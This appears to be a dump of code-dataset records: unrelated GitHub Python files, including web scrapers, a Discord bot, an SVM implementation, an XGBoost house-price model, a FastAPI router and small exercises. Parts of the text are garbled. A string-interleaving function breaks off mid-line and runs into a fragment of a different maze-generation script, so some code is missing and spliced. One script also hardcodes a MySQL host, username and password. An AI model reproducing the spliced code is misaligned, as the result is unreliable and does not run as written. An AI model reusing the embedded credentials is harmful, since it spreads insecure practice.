browser.click_link_by_partial_text('Cerberus Hemisphere Enhanced')\n hemi_html = browser.html\n hemi_soup = BeautifulSoup(hemi_html, 'html.parser')\n\n hemi_list1 = hemi_soup.find ('div', class_= \"downloads\")\n \n cereberus = ''\n\n for a in hemi_list1('a', href=True):\n print (\"Found the URL:\", a['href'])\n cereberus=a['href']\n break\n\n #Grab hemi 2\n# looking for and grabbing a photo title and URL\n\n browser.visit(hemi_url)\n browser.click_link_by_partial_text('Schiaparelli Hemisphere Enhanced')\n hemi_html1 = browser.html\n hemi_soup1 = BeautifulSoup(hemi_html1, 'html.parser')\n\n hemi_list2 = hemi_soup1.find ('div', class_= \"downloads\")\n\n schiaparelli = ''\n\n for a in hemi_list2('a', href=True):\n print (\"Found the URL:\", a['href'])\n schiaparelli=a['href']\n \n break\n\n\n #find hemi 3\n # looking for and grabbing a photo title and URL\n browser.visit(hemi_url)\n browser.click_link_by_partial_text('Syrtis Major Hemisphere Enhanced')\n\n hemi_html2 = browser.html\n hemi_soup2 = BeautifulSoup(hemi_html2, 'html.parser')\n\n hemi_list3 = hemi_soup2.find ('div', class_= \"downloads\")\n\n syrtis = ''\n\n for a in hemi_list3('a', href=True):\n print (\"Found the URL:\", a['href'])\n syrtis=a['href']\n break\n\n # find hemisphere 4\n # looking for and grabbing a photo title and URL\n browser.visit(hemi_url)\n browser.click_link_by_partial_text('Valles Marineris Hemisphere Enhanced')\n\n hemi_html3 = browser.html\n hemi_soup3 = BeautifulSoup(hemi_html3, 'html.parser')\n\n hemi_list4 = hemi_soup3.find ('div', class_= \"downloads\")\n\n valles= ''\n\n for a in hemi_list4('a', href=True):\n print (\"Found the URL:\", a['href'])\n valles=a['href']\n break\n \n # saving locations URLS of 4 photos and their titles in a dictionary\n hemisphere_image_urls = [\n {\"title\": \"Valles 
Marineris Hemisphere\", \"img_url\": valles},\n {\"title\": \"Cerberus Hemisphere\", \"img_url\": cereberus},\n {\"title\": \"Schiaparelli Hemisphere\", \"img_url\": schiaparelli},\n {\"title\": \"Syrtis Major Hemisphere\", \"img_url\": syrtis},\n ]\n\n #Saving dictionary of URL and tittels in Mongo db\n mars_data[\"hemisphere_imgs\"] = hemisphere_image_urls","repo_name":"wolfbreeze/10WebScrape","sub_path":"scrape.py","file_name":"scrape.py","file_ext":"py","file_size_in_byte":7519,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"25521215258","text":"import os\nimport pysal\nimport numpy as np\n\nexamples = os.path.join(os.path.dirname(pysal.__file__), 'examples', 'us_income')\n\ninput_file = pysal.open(os.path.join(examples, 'usjoin.csv'))\npci = np.array([input_file.by_col[str(y)] for y in range(1929, 2010)])\npci = pci.transpose()\n\nweights = pysal.open(os.path.join(examples, \"states48.gal\")).read()\nmaxp = pysal.Maxp(weights, pci, floor=5, floor_variable=np.ones((48, 1)), initial=99)\n\nnames = input_file.by_col('Name')\nnames = np.array(names)\n\nfor region in maxp.regions:\n ids = list(map(int, region))\n print(\", \".join(names[ids]))\n","repo_name":"flaxandteal/python-course","sub_path":"011-geography/python/ps.py","file_name":"ps.py","file_ext":"py","file_size_in_byte":590,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"61"} +{"seq_id":"10535704012","text":"print(\"*** PREGUNTA 1 ***\")\n#Crea una Función que reciba 2 String como parametros.\\n Que retorne 1 String de largo\n#Que contenga las 2 primeras letras del 1er string y las 2 últimas del segundo string\n\ndef mesclador(string_a, string_b):\n if len(string_a)<3 or len(string_b)<3 :\n print(\"El largo de las palabras a ingresar debe ser mayor a 2 caracteres\")\n else:\n uno=(string_a[:2])\n #print(uno)\n dos=(string_b[-2:])\n #print(dos)\n mix= uno + dos\n return mix\n#Prueba\n#print(\"\\nPrueba función mesclador string_a = hola, string_b = chao \")\nprint(mesclador(\"Funciones\",\"Strings\"))\n\nprint(\"\\n ***PREGUNTA 2***\")\n#Escriba una función que reciba dos strings como parámetros y retorne un nuevo string que consista del primero,\n#pero con el segundo string intercalado entre cada letra del primero.\ndef intercarlar(string_a,string_b):\n i=0\n largo =len(string_a)\n j= \"\"\n while iy[0]:\r\n\t\t\tmaplist[x[0]][x[1]]|=(1<<1)\r\n\t\t\tmaplist[y[0]][y[1]]|=(1<<0)\r\n\t\telif x[0]y[1]:\r\n\t\t\tmaplist[x[0]][x[1]]|=(1<<3)\r\n\t\t\tmaplist[y[0]][y[1]]|=(1<<2)\r\n\t\telif x[1]0:\r\n\t\tchoicelist=[]\r\n\t\tfor i in range(4):\r\n\t\t\tif 0<=now[0]+direct[i][0] max_:\n max_ = item\n pos_max = idx\nprint(f'min = {min_},\\nmax = {max_}')\n\nsum_ = 0\nfor idx, item in enumerate(array):\n if pos_min < idx < pos_max:\n print(item)\n sum_ += item\n elif pos_max < idx < pos_min:\n print(item)\n sum_ += item\nprint(f' Сумма элементов между минимальным и максимальным равна : {sum_}')\n","repo_name":"SergeyDuvanskiy/AlgorithmsInPython","sub_path":"Lesson_3/task_6.py","file_name":"task_6.py","file_ext":"py","file_size_in_byte":1098,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"18022899305","text":"import discord\nfrom discord.ext import commands\nfrom discord import FFmpegPCMAudio\nfrom keys.apikey import *\nfrom profanity_check import predict\nimport requests, json\n\n# initialize bot\nintents = discord.Intents.default()\nintents.members = 
True\nintents.message_content = True\nclient = commands.Bot(command_prefix='!', intents=intents)\n\n# this function is executed when the bot is ready to receive commands\n@client.event\nasync def on_ready():\n print('The bot is ready for use')\n print('-------------------------')\n\n# when a user types !hello this function will run\n@client.command()\nasync def hi(ctx):\n url = \"https://dad-jokes.p.rapidapi.com/random/joke\"\n\n headers = {\n \"X-RapidAPI-Key\": JOKE_API,\n \"X-RapidAPI-Host\": \"dad-jokes.p.rapidapi.com\"\n }\n\n response = requests.get(url, headers=headers)\n\n joke = json.loads(response.text)['body']\n\n await ctx.send(f\"hi! \\n\\n{joke[0]['setup']}\\n\\n{joke[0]['punchline']}\")\n\n\n# detect when someone joins your server and send a message\n@client.event\nasync def on_member_join(member):\n channel = client.get_channel(CHANNEL_ID)\n await channel.send('Hello')\n\n# detect when someone leaves your server and send a message\n@client.event\nasync def on_member_remove(member):\n channel = client.get_channel(CHANNEL_ID)\n await channel.send('Goodbye')\n\n@client.command(pass_context=True)\nasync def join(ctx):\n if (ctx.author.voice):\n channel = ctx.message.author.voice.channel\n voice = await channel.connect()\n source = FFmpegPCMAudio('dog-barking.wav')\n player = voice.play(source)\n else:\n await ctx.send('You must be in a voice channel to run this command.')\n\n# if the bot is in a voice channel then it'll leave and send message\n@client.command(pass_context=True)\nasync def leave(ctx):\n if (ctx.voice_client):\n await ctx.guild.voice_client.disconnect()\n await ctx.send('I\\'ve left the voice channel')\n else:\n await ctx.send('I am not in a voice channel')\n\n# detecting specific words through events\n@client.event\nasync def on_message(message):\n if predict([message.content]) > 0:\n await message.delete()\n await message.channel.send('Don\\'t send that again')\n\n# link the bot to the web app (tells the bot to run)\nclient.run(BOT_TOKEN)\n\n","repo_name":"DonnovanJiles70122/Discord_Bot","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2295,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"11760041311","text":"def bazel_repositories(\n bazel_version,\n bazel_sha256,\n rules_go_version,\n rules_go_sha256,\n buildtools_version,\n buildtools_sha256,\n):\n native.http_archive(\n name=\"io_bazel\",\n sha256=bazel_sha256,\n strip_prefix=\"bazel-%s\" %\n bazel_version, # Should match current Bazel version\n urls=[\n \"http://bazel-mirror.storage.googleapis.com/github.com/bazelbuild/bazel/archive/%s.tar.gz\"\n % bazel_version,\n \"https://github.com/bazelbuild/bazel/archive/%s.tar.gz\" %\n bazel_version,\n ],\n )\n\n native.http_archive(\n name=\"io_bazel_rules_go\",\n sha256=rules_go_sha256,\n strip_prefix=\"rules_go-%s\" % rules_go_version, # branch master\n urls=[\n \"https://github.com/bazelbuild/rules_go/archive/%s.zip\" %\n rules_go_version\n ],\n )\n\n native.http_archive(\n name=\"com_github_bazelbuild_buildtools\",\n sha256=buildtools_sha256,\n strip_prefix=\"buildtools-%s\" % buildtools_version, # branch master\n urls=[\n \"https://github.com/bazelbuild/buildtools/archive/%s.zip\" %\n buildtools_version\n ],\n )\n","repo_name":"ostera/rules_reason","sub_path":"reason/repositories/bazel.bzl","file_name":"bazel.bzl","file_ext":"bzl","file_size_in_byte":1228,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"61"} 
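Editor's note on the discord bot record above (main.py, seq_id 18022899305): registering an on_message event on a commands.Bot replaces the default handler that dispatches prefix commands, so !hi, !join, and !leave would never fire as written. A minimal sketch of the standard discord.py remedy, keeping the record's profanity_check filter; the early return for the bot's own messages is an added, conventional guard, not part of the original:

@client.event
async def on_message(message):
    # Ignore the bot's own messages so deletions/replies cannot loop.
    if message.author == client.user:
        return
    # Same profanity filter as the original record.
    if predict([message.content]) > 0:
        await message.delete()
        await message.channel.send('Don\'t send that again')
        return
    # Hand the message back to the command dispatcher (!hi, !join, !leave).
    await client.process_commands(message)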
+{"seq_id":"19804198602","text":"import os\r\nimport os.path\r\nimport shutil\r\nimport gui\r\nimport time\r\n\r\ns_path=gui.source\r\ndestination=gui.destination\r\nchoice=gui.choice\r\nfilelist=os.listdir(s_path)\r\nprint(\"_____________________________\\n\")\r\nprint(\"F I L E L I S T ::: \\n \")\r\nfor i in filelist:\r\n print(i)\r\nprint(\"_____________________________\\n\")\r\ns_path += '/'\r\ndestination += '/'\r\n\r\nif choice == 'extension wise':\r\n os.chdir(s_path)\r\n print(os.getcwd())\r\n exlist=[]\r\n\r\n for file in filelist:\r\n ex = file.split('.')[-1]\r\n exlist.append(ex)\r\n\r\n exlist=set(exlist)\r\n print(\"extension set of list : \",exlist)\r\n \r\n try:\r\n for ex in exlist:\r\n os.mkdir(destination + '/' + ex)\r\n for file in filelist:\r\n if ex == file.split('.')[-1]:\r\n if os.path.isfile(file):\r\n shutil.move(file , destination + '/' + ex)\r\n \r\n except FileExistsError:\r\n for ex in exlist:\r\n for file in filelist:\r\n if ex == file.split('.')[-1]:\r\n if os.path.isfile(file):\r\n shutil.move(file , destination + '/' + ex)\r\n \r\n \r\n \r\nelif choice == \"date & time wise\":\r\n s_path += '/'\r\n destination += '/'\r\n for file in filelist:\r\n t = os.path.getmtime(s_path + file)\r\n\r\n time1=time.ctime(t)\r\n\r\n year = time1[-4:]\r\n month = time1[4:7]\r\n date = time1[8:10]\r\n \r\n \r\n if not(os.path.isdir(destination + year)):\r\n path=os.path.join(destination, year)\r\n os.mkdir(path)\r\n if not(os.path.isdir(destination + year + '/' + month)):\r\n path1=os.path.join(destination + year , month)\r\n os.mkdir(path1)\r\n if not(os.path.isdir(destination + year + '/' + month + '/' + date)):\r\n path2=os.path.join(destination + year + '/' + month , date)\r\n os.mkdir(path2)\r\n\r\n s = s_path + file\r\n d = destination + year + '/' + month + '/' + date + '/' + file\r\n\r\n if os.path.exists(d):\r\n print(file,\" ------------->>> already exists\")\r\n continue\r\n\r\n shutil.move(s,d)","repo_name":"Jatin-nabhoya/Auto_File_Organization-Jatin_Nabhoya","sub_path":"auto_file_organization.py","file_name":"auto_file_organization.py","file_ext":"py","file_size_in_byte":2181,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"20525261111","text":"\nimport numpy as np\nfrom read_file import read_file\nimport sys\nimport time\n\n# X is the data matrix (each row is a data point)\n# Y is desired output (1 or -1)\n\n\nclass myPegasos ():\n \"\"\" class myPegasos which implements SVM using \n Stochastic Gradient Descent implemneted with \n the Pegasos algorithm for training linear SVM.\n\n Attributes:\n lossf (list): store primal objective function value for each iteration\n w (numpy.array): trained weight\n y (numpy.array): class labels\n \"\"\"\n\n def __init__(self, X, y, _lambda, k):\n '''initialize classifer and train model\n\n Args:\n X(numpy.array): Data Matrix with mxn where m is the\n y (numpy.array): Target vector (1,-1)\n _lambda = regularization paramter\n k: training sample size for each iteration\n '''\n\n self.lossf = []\n self.w = self.optimize(X, y, _lambda, k)\n\n def optimize(self, X, y, _lambda, k):\n \"\"\"estimate the weight vector and intercept given X, y, _lambda, k\n Args:\n X (numpy.array): Data Matrix\n y (numpy.array): Response Vector\n Returns:\n numpy.array: trained weight vector w\n\n \"\"\"\n\n i_weight = np.zeros(X.shape[1])\n i_weight.fill(np.sqrt(1 / _lambda / X.shape[1]))\n rand_neg = np.random.randint(\n 0, high=X.shape[1], size=int(X.shape[1] / 2))\n i_weight[rand_neg] = 
-i_weight[rand_neg]\n\n w_current = i_weight\n\n ite = 0\n for t in range(1, 100 * X.shape[0]):\n ite = ite + 1\n if k != 1:\n X_t, y_t = self.selectk_data(X, y, k)\n\n else:\n ind = np.random.randint(0, high=X.shape[0], size=k)\n X_t, y_t = X[ind], y[ind]\n inds = np.dot(X_t, w_current) * y_t < 1\n\n X_sub = X_t[inds, :]\n y_sub = y_t[inds]\n\n const_t = 1.0 / _lambda / (t)\n weight = (1 - const_t * _lambda) * \\\n w_current + const_t / k * np.dot(y_sub, X_sub)\n mini = np.array([1, 1 / np.sqrt(_lambda) /\n np.sqrt(np.sum(weight**2))])\n\n w_new = np.amin(mini) * weight\n\n self.lossf.append(self.lossfxns(X, y, w_new, _lambda))\n\n if sum((w_new - w_current) ** 2) < 0.01:\n\n break\n else:\n w_current = w_new\n\n print(ite, ' iterations')\n return w_current\n\n def selectk_data(self, X, y, k):\n \"\"\"Select training set for each iteration\n\n Args:\n X (numpy.array): Data Matrix\n y (numpy.array): Response Vector\n k (int): training sample size for each iteration\n\n Returns:\n (numpy.array, numpy.array): (X_k, y_k)\n \"\"\"\n percent = k / 2000.0\n X_1 = X[y == 1]\n X_2 = X[y == -1]\n y_1 = y[y == 1]\n y_2 = y[y == -1]\n\n inds1 = np.random.randint(\n 0, high=X_1.shape[0], size=round(percent * X_1.shape[0]))\n inds2 = np.random.randint(\n 0, high=X_2.shape[0], size=round(percent * X_2.shape[0]))\n\n X_k = np.concatenate((X_1[inds1, :], X_2[inds2, :]))\n y_k = np.concatenate((y_1[inds1], y_2[inds2]))\n return X_k, y_k\n\n def predict(self, X, y):\n \"\"\"Predict the class label for each observation in\n the data X and calculate error based on response vector y\n\n Args:\n predicted(numpy.array, numpy.array):\n Returns:\n float: error based on predicted class vs response vector\n \"\"\"\n prediction = np.dot(self.w[:, np.newaxis].T, X.T)\n prediction = np.squeeze(prediction)\n\n predict = np.zeros_like(y)\n for i in range(prediction.shape[0]):\n if prediction[i] > 0:\n predict[i] = 1\n else:\n predict[i] = -1\n\n errors = np.array([predict[i] != y[i] for i in range(0, y.shape[0])])\n totalerror = np.sum(errors) / y.shape[0]\n return totalerror\n\n def lossfxns(self, X, y, w, _lambda):\n \"\"\"Calcualte the loss function for the SVM problem\n\n Args:\n X (numpy.array): Design Matrix (m x n)\n y (numpy.array): Response Vector (1 x m)\n weight (numpy.array): weight parameter (1 x n)\n _lambda (float): regularization parameter\n Returns:\n float: current value of the primal objective function\n \"\"\"\n tmp = 1 - y * np.dot(X, w)\n lossf = sum(tmp[(1 - y * np.dot(X, w)) > 0]) / X.shape[0] + \\\n _lambda / 2 * np.dot(w, w)\n return lossf\n\n\ndef featureNormalize(X):\n \"\"\"Preprocesses the data by subtracing the mean and dividing over std.axis\n Also adds intercept into feature\n\n Args:\n X (numpy.array): Data Matrix (m x n)\n\n Returns:\n numpy.array: Processed Data Matrix\n \"\"\"\n stds = X.std(axis=0)\n newX = np.delete(X, np.where(stds == 0), 1)\n\n stds = newX.std(axis=0)\n means = newX.mean(axis=0)\n newX = (newX - means) / stds\n\n return np.concatenate((np.ones((newX.shape[0], 1)), newX), axis=1)\n\n\nif __name__ == \"__main__\":\n X, y = read_file(sys.argv[1])\n X = featureNormalize(X)\n\n times = []\n numruns = int(sys.argv[3])\n k = int(sys.argv[2])\n\n for i in range(numruns):\n print(\"Training model \", i + 1, ' out of ',\n numruns, \"...\")\n\n begin = time.time()\n mP = myPegasos(X, y, 1e-4, k)\n\n end = time.time()\n times.append(end - begin)\n\n print('Runtime: ', round(end - begin, 3), ' seconds')\n\n print(\"\\n\")\n # Print combined error rates for each train set\n # 
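The optimize method above interleaves batch selection, the weight update, and the projection step. Stripped to its core, one Pegasos update for a mini-batch (X_t, y_t) looks like the sketch below (NumPy only; the names are illustrative, not the class API):

import numpy as np

def pegasos_step(w, X_t, y_t, lam, t, k):
    # Keep only the batch rows that violate the margin: y * <w, x> < 1.
    mask = y_t * (X_t @ w) < 1
    eta = 1.0 / (lam * t)  # the 1/(lambda*t) step-size schedule
    w = (1 - eta * lam) * w + (eta / k) * (y_t[mask] @ X_t[mask])
    # Project back onto the ball of radius 1/sqrt(lambda), which is
    # what the np.amin(mini) * weight line in the class computes.
    norm = np.linalg.norm(w)
    radius = 1.0 / np.sqrt(lam)
    if norm > radius:
        w *= radius / norm
    return w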
percent averaged by the number of folds that ran\n    print(\"------FINAL RESULT -------\")\n    print('Average runtime w/ minibatch size of ', k,\n          ':\\t', round(np.mean(times), 3), \" sec.\")\n\n    print('STD runtime w/ minibatch size of ', k,\n          ':\\t', round(np.std(times), 3), \" sec.\")\n","repo_name":"DanielYWu/svm-scratch","sub_path":"myPegasos.py","file_name":"myPegasos.py","file_ext":"py","file_size_in_byte":6063,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"2920176887","text":"#read data\r\nimport numpy as np\r\nimport pandas as pd\r\ndata = pd.read_csv(\"C:\\\\xampp\\\\htdocs\\\\HOUSE_PRICE_PREDICTION\\\\data.csv\")\r\n\r\nx = data.drop(labels = [\"price\"],axis=1).copy()\r\ny = ((data[\"price\"])/1000000).copy()\r\n\r\n#preprocessing using MinMaxScaler\r\nfrom sklearn.preprocessing import MinMaxScaler\r\nalgo = MinMaxScaler()\r\nalgo.fit(x)\r\ndata1 = pd.DataFrame(data = algo.fit_transform(x),columns=x.columns,index = x.index)\r\n\r\n#split data\r\nfrom sklearn import model_selection\r\nxtrain,xtest,ytrain,ytest=model_selection.train_test_split(x,y,test_size =0.2)\r\n\r\n#train model -- XGBRegressor from xgboost\r\nfrom xgboost import XGBRegressor\r\nmodel = XGBRegressor()\r\nmodel.fit(xtrain,ytrain)\r\n\r\n#checking error for training data\r\nfrom sklearn import metrics\r\npred = model.predict(xtrain)\r\nscore1 = metrics.r2_score(ytrain,pred)\r\nscore2 = metrics.mean_absolute_error(ytrain,pred)\r\n\r\n#checking error for testing data\r\ntest_pred = model.predict(xtest)\r\nscore3 = metrics.r2_score(ytest,test_pred)\r\nscore4 = metrics.mean_squared_error(ytest,test_pred)\r\n\r\n\r\n# load and dump the model using pickle\r\nimport pickle\r\npickle.dump(model,open('python/models/model.pkl','wb'))\r\n\r\nmodels = pickle.load(open('python/models/model.pkl','rb'))\r\nd = pd.DataFrame([[3,2.5,1460,7573,2,0,0,3,1460,0,1983,2009]],columns=x.columns)\r\n\r\nprint(model.predict(d)*1000000)\r\nprint(score3,score4)","repo_name":"rachit-singhal12/house-price-prediction","sub_path":"python/house.py","file_name":"house.py","file_ext":"py","file_size_in_byte":1355,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"33543935754","text":"import numpy as np\nimport pymysql\nfrom DBUtils.PooledDB import PooledDB\nimport time\nimport traj_dist.distance as tdist\nimport math\n\nstart = time.perf_counter()\n\ndef conndbWithPool():\n\n    pool = PooledDB(pymysql, 5, host=\"10.103.31.129\", user=\"nmy\", passwd=\"819819\", db=\"wifi_union\", port=3306)  # 5 is the minimum number of connections kept in the pool\n    conn = pool.connection()\n    cur = conn.cursor()\n    SQL = \"SELECT usermac,latitude,longitude FROM wifi_union.appunion_log_detailed_concise where latitude<>0 group by time order by usermac;\"\n    r = cur.execute(SQL)\n    r = cur.fetchall()\n    cur.close()\n    conn.close()\n\n    return r\n\ndef store_to_dirct(rs):\n    user = {}\n    new_list = []\n    for n in rs:\n        if n[0] not in user:\n            new_list=[]\n        new_list.append(list(map(float, [n[1],n[2]])))\n        user[n[0]]=new_list\n    return user\n\n\ndef computeNearestNeighbor(user,username):\n    distances = []\n    for instance in user:\n        if instance != username:\n            distance = tdist.edr(np.array(user[username]), np.array(user[instance]))\n            #reciprocal of (log10 of the Hausdorff distance, plus 1)\n            # distance=1/(math.log10(distance)+1)\n            distances.append((instance, distance))\n    distances.sort(key=lambda artistTuple: artistTuple[1], reverse=False)\n    return distances\n\nrs=conndbWithPool()\n\nuser=store_to_dirct(rs)\n\n\n# print(user)\n# 
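One quirk of the house-price script above: it fits a MinMaxScaler and builds a scaled frame (data1), but then trains and predicts on the raw x, so the scaler is dead code, and only the bare model is pickled. A sketch of how a sklearn Pipeline would keep scaling and prediction in sync (reusing xtrain/ytrain from the script):

import pickle
from sklearn.pipeline import Pipeline
from sklearn.preprocessing import MinMaxScaler
from xgboost import XGBRegressor

# The pipeline scales at fit time and again at predict time, and a
# single pickle file captures the scaler together with the model.
pipeline = Pipeline([
    ('scale', MinMaxScaler()),
    ('model', XGBRegressor()),
])
pipeline.fit(xtrain, ytrain)
pickle.dump(pipeline, open('python/models/model.pkl', 'wb'))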
traj_A=np.array(user['28faa04f853a'])\n# traj_B=np.array(user['C4500620C219'])\n#\n# dist = tdist.hausdorff(traj_A,traj_B)\n# print(dist,math.log10(dist))\n#\ndistances=computeNearestNeighbor(user,'C4500620C219')\nprint(distances)\n\nend=time.perf_counter()\nprint (\"read: %f s\" % (end - start))\n\n\n","repo_name":"niumingyoi123/WiFi_UNION","sub_path":"traj_dist/location_db.py","file_name":"location_db.py","file_ext":"py","file_size_in_byte":1649,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"3683770984","text":"# options.py\n\nfrom modules.db.mongodb import get_db_mumshoppe\nfrom pymongo import ReturnDocument\nfrom bson import json_util\nimport json\nimport uuid\n\nfrom typing import Optional\n\nfrom fastapi import APIRouter, Response, status\nfrom pydantic import BaseModel\n\n\nclass Option(BaseModel):\n    optionguid: Optional[str] = None\n    name: str\n    subsection: Optional[str] = ''\n    price: float\n    position: Optional[int] = 0\n\n\nclass Section(BaseModel):\n    guid: Optional[str] = None\n    shoppe_guid: str\n    title: str\n    notes: Optional[str]\n    options: list[Option]\n    position: Optional[int] = 0\n\n\nrouter = APIRouter(\n    prefix=\"/options\",\n    tags=[\"mumshoppe_options\"],\n    responses={\n        404: {\"description\": \"Not found\"},\n        400: {\"description\": \"Invalid request\"}\n    }\n)\n\n# TODO: CRUD for option items\n\n\n@router.get(\"/list/{shoppe_id}\", status_code=status.HTTP_200_OK)\nasync def get_section(shoppe_id: str, response: Response):\n    try:\n        section_collection = get_db_mumshoppe().sections.find({\n            \"shoppe_guid\": shoppe_id\n        })\n        return json.loads(json_util.dumps(section_collection))\n    except Exception as e:\n        response.status_code = status.HTTP_400_BAD_REQUEST\n        print('Failed to list options', e)\n        return None\n\n\n@router.post(\"/\", status_code=status.HTTP_201_CREATED)\nasync def add_section(section: Section, response: Response):\n    try:\n        section_collection = get_db_mumshoppe().sections\n        if not section.guid:\n            section.guid = str(uuid.uuid4())\n\n        for detail in section.options:\n            if not detail.optionguid or len(detail.optionguid) == 0:\n                detail.optionguid = str(uuid.uuid4())\n\n        record = section_collection.find_one_and_update(\n            {\"guid\": section.guid},\n            {\"$set\": section.dict()},\n            upsert=True,\n            return_document=ReturnDocument.AFTER)\n        # Remove object id - we're not using that as an index and it breaks Pydantic\n        del record[\"_id\"]\n        return record\n    except Exception as e:\n        response.status_code = status.HTTP_400_BAD_REQUEST\n        return {\"Error\": e}\n\n\n@router.patch(\"/{section_id}\", status_code=status.HTTP_202_ACCEPTED)\nasync def update_section(section_id: str, section: Section, response: Response):\n    try:\n        for detail in section.options:\n            if detail.optionguid == None or detail.optionguid == '':\n                detail.optionguid = str(uuid.uuid4())\n        \n        section_collection = get_db_mumshoppe().sections\n        record = section_collection.find_one_and_update(\n            {\"guid\": section_id},\n            {\"$set\": section.dict()},\n            upsert=True,\n            return_document=ReturnDocument.AFTER)\n        del record[\"_id\"]\n        return record\n    except Exception as e:\n        response.status_code = status.HTTP_400_BAD_REQUEST\n        return {\"Unable to update options\": e}\n\n# TODO: For each option in a section, if there is no GUID, need to add one before insert / update on that record\n\n\n@router.delete('/{section_id}', status_code=status.HTTP_202_ACCEPTED)\nasync def delete_section(section_id: str, response: Response):\n    try:\n        section_collection = get_db_mumshoppe().sections\n        record = 
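The timing calls in the trajectory script were written against time.clock(), which was deprecated in Python 3.3 and removed in 3.8; time.perf_counter(), used in the corrected version above, is the drop-in replacement for this kind of benchmarking:

import time

start = time.perf_counter()  # monotonic, high-resolution timer
# ... the work being measured ...
elapsed = time.perf_counter() - start
print("read: %f s" % elapsed)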
section_collection.find_one_and_delete(\n {\"guid\": section_id},\n )\n return True\n except Exception as e:\n response.status_code = status.HTTP_400_BAD_REQUEST\n return {\"Unable to delete section\": e}\n","repo_name":"bulldoguk/myhmbiz-api","sub_path":"routers/options.py","file_name":"options.py","file_ext":"py","file_size_in_byte":3471,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"8735074504","text":"from collections import defaultdict\nfrom typing import Counter\n\n\nwith open(\"day_14/input.txt\") as file:\n START_MOLECULE = file.readline().strip()\n file.readline() # Blank line\n RULES = dict(line.strip().split(\" -> \") for line in file.readlines())\n\nSTEPS = 40\n\ntotal_elements = defaultdict(lambda: 0)\nfor element in START_MOLECULE:\n total_elements[element] += 1\n\npatterns = defaultdict(lambda: 0)\n\nfor i in range(len(START_MOLECULE) - 1):\n key = START_MOLECULE[i] + START_MOLECULE[i + 1]\n patterns[key] += 1\n\nfor _ in range(STEPS):\n new_patterns = defaultdict(lambda: 0)\n\n for pattern, extra in RULES.items():\n count = patterns[pattern]\n\n total_elements[extra] += count\n new_patterns[pattern[0] + extra] += count\n new_patterns[extra + pattern[1]] += count\n\n patterns = new_patterns\n\ncounter = Counter(total_elements).most_common()\nprint(counter[0][1] - counter[-1][1])\n","repo_name":"Akarys42/aoc-2021","sub_path":"day_14/part_2.py","file_name":"part_2.py","file_ext":"py","file_size_in_byte":924,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"2600941010","text":"TextFile = open(\"qb.txt\", \"r\")\r\nTextList = TextFile.readlines()\r\nTextFile.close()\r\n\r\nCharacter = input(\"enter a character: \")\r\n\r\nOutFile = open(\"OutFile.txt\", \"w\")\r\n\r\nfor line in TextList:\r\n PositionCounter = 0\r\n while PositionCounter != len(line):\r\n if line[PositionCounter] == ' ':\r\n line = line[:PositionCounter] + Character + line[PositionCounter + 1:]\r\n PositionCounter = PositionCounter + 1\r\n OutFile.write(line + '\\n')\r\n \r\n\r\nOutFile.close()\r\n \r\n \r\n\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n ","repo_name":"Yuudachi530/assignment-19.9.19","sub_path":"q1.py","file_name":"q1.py","file_ext":"py","file_size_in_byte":631,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"9224337144","text":"__author__ = \"EUROCONTROL (SWIM)\"\n\nfrom unittest import mock\n\nimport pytest\nfrom requests import Session, HTTPError, Response\n\nfrom met_update.adapters import avwx\nfrom met_update import config\n\n\ndef test_get_session__avwx_token_not_set__raises_error(monkeypatch):\n monkeypatch.setattr(config, 'AVWX_TOKEN', None)\n\n with pytest.raises(ValueError) as e:\n avwx.get_session()\n\n assert str(e.value) == 'AVWX_TOKEN not set'\n\n\ndef test_get_session__no_errors__returns_session_object(monkeypatch):\n monkeypatch.setattr(config, 'AVWX_TOKEN', 'some_token')\n\n result = avwx.get_session()\n\n assert isinstance(result, Session)\n assert result.headers == {'Authorization': f'BEARER some_token'}\n\n\n@mock.patch('met_update.adapters.avwx.get_session')\ndef test_call_api__response_with_error__raises(mock_get_session):\n mock_response = Response()\n mock_response.status_code = 400\n\n mock_session = mock.Mock()\n mock_session.get = mock.Mock(return_value=mock_response)\n\n mock_get_session.return_value = mock_session\n\n with pytest.raises(HTTPError):\n 
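The day-14 polymer solution above never materializes the string: it tracks how many times each adjacent pair occurs, and one insertion step just redistributes those counts. A compact sketch of that single step, with the same rule format ('NN' -> 'C'):

from collections import Counter

def step(pairs: Counter, rules: dict) -> Counter:
    # 'NN' with rule NN -> C becomes one 'NC' and one 'CN'; counts
    # move between pairs, so a step is O(number of distinct pairs)
    # regardless of how long the implied string has become.
    nxt = Counter()
    for (a, b), n in pairs.items():
        middle = rules.get(a + b)
        if middle is None:
            nxt[(a, b)] += n
        else:
            nxt[(a, middle)] += n
            nxt[(middle, b)] += n
    return nxt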
